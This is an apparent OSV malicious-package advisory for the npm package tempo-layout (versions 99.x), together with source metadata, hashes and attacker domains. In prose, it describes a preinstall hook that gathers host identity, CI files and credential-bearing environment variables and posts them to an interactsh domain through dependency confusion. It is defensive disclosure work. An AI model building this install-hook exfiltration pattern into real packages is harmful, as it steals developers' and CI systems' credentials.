MAL-2026-4686

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/tempo-layout/MAL-2026-4686.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4686

Published

2026-05-25T13:57:52Z

Modified

2026-05-26T06:02:58.956225526Z

Summary

Malicious code in tempo-layout (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6)

tempo-layout@99.0.2 ships a preinstall hook (poc.js) that unconditionally collects host identity (os.hostname, whoami, id), network configuration (ipconfig/ip a/resolv.conf), git remote, parent package.json, CI pipeline files (.gitlab-ci.yml,.github/workflows, Jenkinsfile, azure-pipelines.yml), and a filtered sweep of environment variables matching TOKEN/AWS/AZURE/NPM/GITHUB/GITLAB/JENKINS/WALMART/CI_/BUILD prefixes. The collected JSON is POSTed over HTTPS to a hardcoded interactsh subdomain (d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me) on npm install. The package additionally self-identifies as a dependency-confusion proof-of-concept targeting an internal namespace (@livingdesign/react) and is published to the public npm registry so any organization whose resolver falls through to public npm receives the payload. Regardless of any bug-bounty framing in the metadata, the published artifact harvests installer credentials and CI tokens and ships them off-host on install — this is an installer-side supply-chain attack.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "44d04dff489ed1e87d2258e629b6f6b7c6b4090c2f4540e1aa3dab87d2999690",
            "id": "IN-MAL-2026-004670",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:04:54Z",
            "versions": [
                "99.0.1"
            ],
            "import_time": "2026-05-26T05:53:03.421717477Z"
        },
        {
            "sha256": "c3f1e43c7ff8f95617d841a068f59847f92e6487ac024a31cc9e4a765799d7de",
            "id": "IN-MAL-2026-004658",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T13:57:52Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-05-26T05:53:02.146203626Z"
        },
        {
            "sha256": "795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6",
            "import_time": "2026-05-26T05:53:04.109100916Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:09:57Z",
            "versions": [
                "99.0.2"
            ],
            "id": "IN-MAL-2026-004676"
        },
        {
            "sha256": "ada1f3c19a6252264962a2efe3bc53fba1340c3bce76257ef9054ac5e1963a5d",
            "id": "IN-MAL-2026-004657",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T13:57:52Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-05-26T05:53:02.037284755Z"
        },
        {
            "sha256": "b17d078c4f137d26fb548d86936b2da4ae3b3ab1328d14fed33975ab5a140d3f",
            "id": "IN-MAL-2026-004671",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:04:54Z",
            "versions": [
                "99.0.1"
            ],
            "import_time": "2026-05-26T05:53:03.545519374Z"
        },
        {
            "sha256": "b200465f630596d74ae24899022d0a24082514304b201987ca6e4cbecaf317bf",
            "id": "IN-MAL-2026-004677",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T14:09:58Z",
            "versions": [
                "99.0.2"
            ],
            "import_time": "2026-05-26T05:53:04.223105075Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / tempo-layout

Package

Name: tempo-layout; View open source insights on deps.dev
Purl: pkg:npm/tempo-layout

Affected ranges

Affected versions

99.*

99.0.0

99.0.1

99.0.2

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/tempo-layout/MAL-2026-4686.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "domains": [
        "d8a56vpon5budaeafq00tsyj88aqd5m7p.oast.pro",
        "tempo-layout-7363616e2d38663633613365656333.d8a56vpon5budaeafq00tsyj88aqd5m7p.oast.pro"
    ],
    "evidence_files": [
        {
            "sha256": "ecb577737482bd21bf2693c33bb07cb998eb03401ed5f8d8b6a295f19da7b9b4",
            "tlsh": "de3165d615f9647036a7f6c0b0d6ad514367e323b54af8e8258c094123df9f141f92e5",
            "path": "poc.js"
        },
        {
            "sha256": "6b4cf996dc6565995b4b6f0f7f24a5ae446b8a301c9a8b65ca70f158e6c0cb17",
            "tlsh": "4ae07d78141020235ad8c3fa05b658479128cd0b11186c1d0757344c43aeb63017eb5e",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "tempo-layout-99.0.1.tgz",
            "hashes": {
                "sha1": "f52f6a14d7f0d04e397ca2dcc388d80660455c6e",
                "sha512_sri": "sha512-kxnGG221LCurEj7DMPDdCGOkQhtIsnUMYshGi352sD7gaHjxFc6HoBAlWHWfFIexSHntJy3SEXEAUbk2KHEyWg=="
            }
        }
    ]
}